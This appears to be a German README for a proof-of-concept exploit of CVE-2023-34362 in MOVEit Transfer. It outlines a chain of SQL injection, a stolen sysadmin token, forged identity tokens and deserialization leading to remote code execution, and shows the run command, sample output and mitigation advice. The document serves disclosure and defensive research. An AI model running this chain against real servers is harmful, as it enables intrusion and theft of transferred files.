
PoC für CVE-2023-34362, das MOVEit Transfer betrifft.
POC für CVE-2023-34362, der MOVEit Transfer betrifft
Eine technische Root-Cause-Analyse der Schwachstelle finden Sie im Blog:
Dieser POC nutzt eine SQL-Injection aus, um ein Sysadmin-API-Zugriffstoken zu erlangen, und verwendet diesen Zugriff dann, um einen Deserialisierungsaufruf für Remote-Code-Ausführung auszunutzen.
Dieser POC muss einen Identity-Provider-Endpunkt erreichen, der geeignete RS256-Zertifikate bereitstellt, mit denen beliebige Benutzertoken gefälscht werden können – standardmäßig verwendet dieser POC unseren in AWS gehosteten IDP-Endpunkt.
Der Exploit schreibt standardmäßig eine Datei nach C:\Windows\Temp\message.txt. Alternative Payloads können mithilfe des Projekts ysoserial.net erzeugt werden.
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
Aktualisieren Sie auf die neueste Version oder ergreifen Sie Gegenmaßnahmen, indem Sie den Anweisungen im Progress Advisory folgen
Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und für die Entwicklung wirksamer Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie die Software verantwortungsvoll.